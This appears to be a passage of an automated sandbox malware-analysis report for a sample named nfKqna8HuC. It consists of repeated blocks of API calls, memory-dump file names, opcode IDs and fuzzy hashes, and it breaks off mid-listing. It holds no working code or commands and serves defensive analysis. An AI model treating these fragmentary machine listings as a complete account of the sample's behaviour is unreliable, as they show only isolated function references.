                                                                    • Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd
                                                                    Similarity
                                                                    • API ID: _memset$__filbuf__getptd_noexit_memcpy_s
                                                                    • String ID:
                                                                    • API String ID: 3877424927-0
                                                                    • Opcode ID: 25276d1f646da7b76298e578b8e053e7e3b96e54df01e447abe6ae266d0f960a
                                                                    • Instruction ID: 5e3efb0f2c1efe49c53dceb5b44821c3e415fd8c54eec9430642e6b7e76554a6
                                                                    • Opcode Fuzzy Hash: 25276d1f646da7b76298e578b8e053e7e3b96e54df01e447abe6ae266d0f960a
                                                                    • Instruction Fuzzy Hash: 0951C5B0A00326EBDB249FA988856AE77B3AF41320F24872DF875963D0D7719F518F44
                                                                    APIs
                                                                      • Part of subcall function 00624517: _fseek.LIBCMT ref: 0062452F
                                                                      • Part of subcall function 0066C56D: _wcscmp.LIBCMT ref: 0066C65D
                                                                      • Part of subcall function 0066C56D: _wcscmp.LIBCMT ref: 0066C670
                                                                    • _free.LIBCMT ref: 0066C4DD
                                                                    • _free.LIBCMT ref: 0066C4E4
                                                                    • _free.LIBCMT ref: 0066C54F
                                                                      • Part of subcall function 00641C9D: RtlFreeHeap.NTDLL(00000000,00000000,?,00647A85), ref: 00641CB1
                                                                      • Part of subcall function 00641C9D: GetLastError.KERNEL32(00000000,?,00647A85), ref: 00641CC3
                                                                    • _free.LIBCMT ref: 0066C557
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd
                                                                    Similarity
                                                                    • API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
                                                                    • String ID:
                                                                    • API String ID: 1552873950-0
                                                                    • Opcode ID: 7f252b61be53e347bf95bf8cf1f18cb687a3b92cb37ed7ac3162ce406380a335
                                                                    • Instruction ID: 4143781b3ad072bf3ca2fb928447d1750f927e5d29ee0d713e8f80aebfffc4d4
                                                                    • Opcode Fuzzy Hash: 7f252b61be53e347bf95bf8cf1f18cb687a3b92cb37ed7ac3162ce406380a335
                                                                    • Instruction Fuzzy Hash: B5515EB1A04218AFDF54DF64DC81BADBBBAEF48314F1000AEF259E7251DB715A908F58
                                                                    APIs
                                                                    • _memset.LIBCMT ref: 0063EBB2
                                                                      • Part of subcall function 006251AF: _memset.LIBCMT ref: 0062522F
                                                                      • Part of subcall function 006251AF: _wcscpy.LIBCMT ref: 00625283
                                                                      • Part of subcall function 006251AF: Shell_NotifyIconW.SHELL32(00000001,?), ref: 00625293
                                                                    • KillTimer.USER32(?,00000001,?,?), ref: 0063EC07
                                                                    • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 0063EC16
                                                                    • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00693C88
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd
                                                                    Similarity
                                                                    • API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
                                                                    • String ID:
                                                                    • API String ID: 1378193009-0
                                                                    • Opcode ID: ed38df0614d84eee9fd883ddddbe93e0701ad8e8cf1e63bf236075cea62ddfaa
                                                                    • Instruction ID: 10329fc150e952d4f3b1d061ca1c47df56be61bbe0f3bc3abee92eab18bbba62
                                                                    • Opcode Fuzzy Hash: ed38df0614d84eee9fd883ddddbe93e0701ad8e8cf1e63bf236075cea62ddfaa
                                                                    • Instruction Fuzzy Hash: 66212C70504B94AFEB329B24C859BEBBBEE9F05308F04104DE29F5A381C3712A84CB51
                                                                    APIs
                                                                    • GetTempPathW.KERNEL32(00000104,?), ref: 0066C72F
                                                                    • GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 0066C746
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd
                                                                    Similarity
                                                                    • API ID: Temp$FileNamePath
                                                                    • String ID: aut
                                                                    • API String ID: 3285503233-3010740371
                                                                    • Opcode ID: 594705526ef34ce32d6efc3781c704de2384088eb4e2002037e1a294a6b41108
                                                                    • Instruction ID: 355e14ddb657fec5e5618acfd7987571b783a84fefb8c18e4c51143f8798a808
                                                                    • Opcode Fuzzy Hash: 594705526ef34ce32d6efc3781c704de2384088eb4e2002037e1a294a6b41108
                                                                    • Instruction Fuzzy Hash: 4BD05E7550030EABDB10AB90DC0EFCAB76D9700704F0001A17751A51B1DAB0E799CF55
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: d8dba31ed7b06bb11adbbf2c815c7b5ce8458b006703a4fa8823d723f9248c85
                                                                    • Instruction ID: 22abec497477cc843de967f806c02eb8e79fe6ef64643242ac180d90601cdf87
                                                                    • Opcode Fuzzy Hash: d8dba31ed7b06bb11adbbf2c815c7b5ce8458b006703a4fa8823d723f9248c85
                                                                    • Instruction Fuzzy Hash: 66F158716083019FCB50DF24C881B6AB7E6BF88314F14892EF9999B392D770E945CF82
                                                                    APIs
                                                                    • _memset.LIBCMT ref: 00625022
                                                                    • Shell_NotifyIconW.SHELL32(00000000,?), ref: 006250CB
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd
                                                                    Similarity
                                                                    • API ID: IconNotifyShell__memset
                                                                    • String ID:
                                                                    • API String ID: 928536360-0
                                                                    • Opcode ID: 03c0ba1d1aa880b11092fe5e92e16ea531798a590a4c70055bec224b14bd0803
                                                                    • Instruction ID: 99b4c6d9a7871402618e64861e081056c623e03987b82c5df79f74da1ad03e34
                                                                    • Opcode Fuzzy Hash: 03c0ba1d1aa880b11092fe5e92e16ea531798a590a4c70055bec224b14bd0803
                                                                    • Instruction Fuzzy Hash: F4318DB0604B118FC720DF24E8856D7BBE9FF49304F00092EE69A8A250E7716948CF96
                                                                    APIs
                                                                    • __FF_MSGBANNER.LIBCMT ref: 00643973
                                                                      • Part of subcall function 006481C2: __NMSG_WRITE.LIBCMT ref: 006481E9
                                                                      • Part of subcall function 006481C2: __NMSG_WRITE.LIBCMT ref: 006481F3
                                                                    • __NMSG_WRITE.LIBCMT ref: 0064397A
                                                                      • Part of subcall function 0064821F: GetModuleFileNameW.KERNEL32(00000000,006E0312,00000104,00000000,00000001,00000000), ref: 006482B1
                                                                      • Part of subcall function 0064821F: ___crtMessageBoxW.LIBCMT ref: 0064835F
                                                                      • Part of subcall function 00641145: ___crtCorExitProcess.LIBCMT ref: 0064114B
                                                                      • Part of subcall function 00641145: ExitProcess.KERNEL32 ref: 00641154
                                                                      • Part of subcall function 00647C0E: __getptd_noexit.LIBCMT ref: 00647C0E
                                                                    • RtlAllocateHeap.NTDLL(01260000,00000000,00000001,00000001,00000000,?,?,0063F507,?,0000000E), ref: 0064399F
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd
                                                                    Similarity
                                                                    • API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
                                                                    • String ID:
                                                                    • API String ID: 1372826849-0
                                                                    • Opcode ID: 3a5aa6866305e84fef53305256e9e2b7ffd8382d560159a48cc5cb7894167779
                                                                    • Instruction ID: db68639ced7a010e6d24b93cc31b85accf1dcf7bb74f22ee48e539a6637b1649
                                                                    • Opcode Fuzzy Hash: 3a5aa6866305e84fef53305256e9e2b7ffd8382d560159a48cc5cb7894167779
                                                                    • Instruction Fuzzy Hash: 0B0192313453619EE7613B74DC86A6E238B9F82760F21102AF5059B382EBF49D4186A4
                                                                    APIs
                                                                    • CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,?,?,0066C385,?,?,?,?,?,00000004), ref: 0066C6F2
                                                                    • SetFileTime.KERNELBASE(00000000,?,00000000,?,?,0066C385,?,?,?,?,?,00000004,00000001,?,?,00000004), ref: 0066C708
                                                                    • CloseHandle.KERNEL32(00000000,?,0066C385,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 0066C70F
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd
                                                                    Similarity
                                                                    • API ID: File$CloseCreateHandleTime
                                                                    • String ID:
                                                                    • API String ID: 3397143404-0
                                                                    • Opcode ID: 488ed37106b93a7ebfa8f0a0ce799b7c3711ca340d4ba6c4279938c2b7f521d3
                                                                    • Instruction ID: 537015a686a47e623370e35a4ffb72b38940829ff4c7e148b1ffd84257cdc857
                                                                    • Opcode Fuzzy Hash: 488ed37106b93a7ebfa8f0a0ce799b7c3711ca340d4ba6c4279938c2b7f521d3
                                                                    • Instruction Fuzzy Hash: 4CE08632240214B7DB212B54AC09FDA7F1AEB06770F104110FB55694E097B139118B98
                                                                    APIs
                                                                    • _free.LIBCMT ref: 0066BB72
                                                                      • Part of subcall function 00641C9D: RtlFreeHeap.NTDLL(00000000,00000000,?,00647A85), ref: 00641CB1
                                                                      • Part of subcall function 00641C9D: GetLastError.KERNEL32(00000000,?,00647A85), ref: 00641CC3
                                                                    • _free.LIBCMT ref: 0066BB83
                                                                    • _free.LIBCMT ref: 0066BB95
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd
                                                                    Similarity
                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                    • String ID:
                                                                    • API String ID: 776569668-0
                                                                    • Opcode ID: 20f76424029b3f4f106c4d8a086868d24a1af312dab904e69dcb584714f23b8e
                                                                    • Instruction ID: 97c201832ebedce9c74b966717b0424f02712482113648a4c1a62b486d42bed7
                                                                    • Opcode Fuzzy Hash: 20f76424029b3f4f106c4d8a086868d24a1af312dab904e69dcb584714f23b8e
                                                                    • Instruction Fuzzy Hash: 13E0C2A1200701C2CB206538AE84EF313CE0F05310704181DB419EB242CF28F8C085A8
                                                                    APIs
                                                                      • Part of subcall function 006222A4: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,006224F1), ref: 00622303
                                                                    • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 006225A1
                                                                    • CoInitialize.OLE32(00000000), ref: 00622618
                                                                    • CloseHandle.KERNEL32(00000000), ref: 0069503A
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd
                                                                    Similarity
                                                                    • API ID: Handle$CloseInitializeMessageRegisterWindow
                                                                    • String ID:
                                                                    • API String ID: 3815369404-0
                                                                    • Opcode ID: d0bfe9926355c3e49bbf8efc04e4177ed4adc1e94ea74529e0ad0dba18d18e70
                                                                    • Instruction ID: 974229ab5689e4e82fc6ab052e4de6abad19fbf96f0194229ecc2beb237fbf71
                                                                    • Opcode Fuzzy Hash: d0bfe9926355c3e49bbf8efc04e4177ed4adc1e94ea74529e0ad0dba18d18e70
                                                                    • Instruction Fuzzy Hash: 2971AEB49113C58F8704EF6AACD0499BBA7BB9B340790612ED219CF7B1DB304684EF59
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd
                                                                    Similarity
                                                                    • API ID: __fread_nolock
                                                                    • String ID: EA06
                                                                    • API String ID: 2638373210-3962188686
                                                                    • Opcode ID: dd0e60154d53b503212399c832cfaebe371bc9680e839c62812011679acdb419
                                                                    • Instruction ID: 19c6482a9161d655954e49b2ca9f10d1de828a321065c92d98e178c210eb9f43
                                                                    • Opcode Fuzzy Hash: dd0e60154d53b503212399c832cfaebe371bc9680e839c62812011679acdb419
                                                                    • Instruction Fuzzy Hash: 9301B9719042187EDB58C798C856FEDBBF89B15301F00455EF552D6281E574A7048B60
                                                                    APIs
                                                                    • IsThemeActive.UXTHEME ref: 00623A73
                                                                      • Part of subcall function 00641405: __lock.LIBCMT ref: 0064140B
                                                                      • Part of subcall function 00623ADB: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00623AF3
                                                                      • Part of subcall function 00623ADB: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00623B08
                                                                      • Part of subcall function 00623D19: GetCurrentDirectoryW.KERNEL32(00007FFF,?,00000000,00000001,?,?,00623AA3,?), ref: 00623D45
                                                                      • Part of subcall function 00623D19: IsDebuggerPresent.KERNEL32(?,?,?,?,00623AA3,?), ref: 00623D57
                                                                      • Part of subcall function 00623D19: GetFullPathNameW.KERNEL32(00007FFF,?,?,006E1148,006E1130,?,?,?,?,00623AA3,?), ref: 00623DC8
                                                                      • Part of subcall function 00623D19: SetCurrentDirectoryW.KERNEL32(?,?,?,00623AA3,?), ref: 00623E48
                                                                    • SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00623AB3
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd
                                                                    Similarity
                                                                    • API ID: InfoParametersSystem$CurrentDirectory$ActiveDebuggerFullNamePathPresentTheme__lock
                                                                    • String ID:
                                                                    • API String ID: 924797094-0
                                                                    • Opcode ID: bf510fe456df6c281039239aa90cbd8e02c52f08a21e967ffafd2019ae38850f
                                                                    • Instruction ID: 14b570cc02cacc2b66ede57d9f283e1e4e3afbf4f0495988cbb535f9c37716b6
                                                                    • Opcode Fuzzy Hash: bf510fe456df6c281039239aa90cbd8e02c52f08a21e967ffafd2019ae38850f
                                                                    • Instruction Fuzzy Hash: CB11C0719043919BC740EF25E88594ABBEBEF96310F00591EF5858B2A1DB709684CF96
                                                                    APIs
                                                                    • ___lock_fhandle.LIBCMT ref: 0064EA29
                                                                    • __close_nolock.LIBCMT ref: 0064EA42
                                                                      • Part of subcall function 00647BDA: __getptd_noexit.LIBCMT ref: 00647BDA
                                                                      • Part of subcall function 00647C0E: __getptd_noexit.LIBCMT ref: 00647C0E
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd
                                                                    Similarity
                                                                    • API ID: __getptd_noexit$___lock_fhandle__close_nolock
                                                                    • String ID:
                                                                    • API String ID: 1046115767-0
                                                                    • Opcode ID: 7a5a2ed653f856a35dfb4e5431ee2f4b7b820912d3c601209c11a8c3298a69bb
                                                                    • Instruction ID: cfdd95df6369772dcb73f08fb98c872857fa3848b14b8f5d3604966a37320fe2
                                                                    • Opcode Fuzzy Hash: 7a5a2ed653f856a35dfb4e5431ee2f4b7b820912d3c601209c11a8c3298a69bb
                                                                    • Instruction Fuzzy Hash: 7311A572809650DED751BFA4C8813587A63BF82331F264748E4315F2E3CBB58D8187A9
                                                                    APIs
                                                                      • Part of subcall function 0064395C: __FF_MSGBANNER.LIBCMT ref: 00643973
                                                                      • Part of subcall function 0064395C: __NMSG_WRITE.LIBCMT ref: 0064397A
                                                                      • Part of subcall function 0064395C: RtlAllocateHeap.NTDLL(01260000,00000000,00000001,00000001,00000000,?,?,0063F507,?,0000000E), ref: 0064399F
                                                                    • std::exception::exception.LIBCMT ref: 0063F51E
                                                                    • __CxxThrowException@8.LIBCMT ref: 0063F533
                                                                      • Part of subcall function 00646805: RaiseException.KERNEL32(?,?,0000000E,006D6A30,?,?,?,0063F538,0000000E,006D6A30,?,00000001), ref: 00646856
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd
                                                                    Similarity
                                                                    • API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
                                                                    • String ID:
                                                                    • API String ID: 3902256705-0
                                                                    • Opcode ID: e0832a7a26e9be9ac3d1076713b97b0ee5b56a37c2fb87053b55fd7d68038123
                                                                    • Instruction ID: eb97bd4f7981a5efd3482d087c43f6cb68bd6d2bd6e06ee88d271061816cea4b
                                                                    • Opcode Fuzzy Hash: e0832a7a26e9be9ac3d1076713b97b0ee5b56a37c2fb87053b55fd7d68038123
                                                                    • Instruction Fuzzy Hash: E3F0C83150421E67D744BF98DC019DE7BEF9F02364F60402AFA09D2692DBB0DA4086EA
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd
                                                                    Similarity
                                                                    • API ID: __lock_file_memset
                                                                    • String ID:
                                                                    • API String ID: 26237723-0
                                                                    • Opcode ID: a3e31e6d0d1fafc7c647bbd2f376f1eb7d0fbc1ded645c48cf4451cfb29c96ac
                                                                    • Instruction ID: dfd37228428f148ad6780e2971859347c8738b64a785ebf1b66ef86d25f0dc00
                                                                    • Opcode Fuzzy Hash: a3e31e6d0d1fafc7c647bbd2f376f1eb7d0fbc1ded645c48cf4451cfb29c96ac
                                                                    • Instruction Fuzzy Hash: 8C017C71800219EECF66AFA5CC029DEBB63AF81320F15822DF824563A1D7318B61DB95
                                                                    APIs
                                                                      • Part of subcall function 00647C0E: __getptd_noexit.LIBCMT ref: 00647C0E
                                                                    • __lock_file.LIBCMT ref: 00643629
                                                                      • Part of subcall function 00644E1C: __lock.LIBCMT ref: 00644E3F
                                                                    • __fclose_nolock.LIBCMT ref: 00643634
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd
                                                                    Similarity
                                                                    • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                                                    • String ID:
                                                                    • API String ID: 2800547568-0
                                                                    • Opcode ID: 60308c76350ebe99f04ecf122af138fd9867531f30f4a46e6d15b1b9f3cd679e
                                                                    • Instruction ID: 74a9e3bd3965e9c125d077b222c049d76c2be113ed72160e0f7b264489437206
                                                                    • Opcode Fuzzy Hash: 60308c76350ebe99f04ecf122af138fd9867531f30f4a46e6d15b1b9f3cd679e
                                                                    • Instruction Fuzzy Hash: 3EF09071801625AADB517F65C8027AE7AA36F42330F26810DF425AB3C1CB788A019B5A
                                                                    APIs
                                                                    • CreateProcessW.KERNELBASE(?,00000000), ref: 014DE44D
